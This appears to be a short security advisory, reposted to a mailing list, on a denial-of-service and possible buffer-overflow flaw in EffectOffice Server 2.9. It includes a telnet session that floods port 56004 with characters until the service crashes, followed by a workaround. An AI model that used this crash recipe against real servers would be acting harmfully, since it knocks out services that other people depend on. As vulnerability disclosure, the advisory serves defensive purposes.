<<< Date Index >>>     <<< Thread Index >>>

[securitylab.ru] EffectOffice Server 2.9 problem



Application: EffectOffice Server 2.9
Vendor: EffectOffice
 Vendor Site: http://www.EffectOffice.com
 Remote: Yes
 Exploitable: Yes
 Risk level: High 
 Authors: D_BuG (d_bug @ bk.ru)
 Authors Site: http://www.securitylab.ru 
 
 Description: 
 A vulnerability identified in EffectOffice can be exploited by a
 malicious person to cause a Denial of Service and under specific
 condition can lead to buffer overflow with possibility of remote code
 execution.
 
 Remote user could send a specially crafted data to 56004 TCP port on
 target server to potentially cause the system to crash. 
 
 
 Exploit:
  
 hacker# telnet
 telnet open
 (to) attackhost 56004
 Trying attackhost......
 Connected to attackhost.
 Escape character is '^]'.
 aaaaaaaaaa
 aaaaaaaaaa
 aaaaaaaaaa
 aaaaaaaaaa
 ^]
 telnetclose
 telnetquit
 hacker#
 ...
 Crash service
 
 
 Workaround: Restrict access to the service allowing only connection
 attempts from trusted IPs if possible.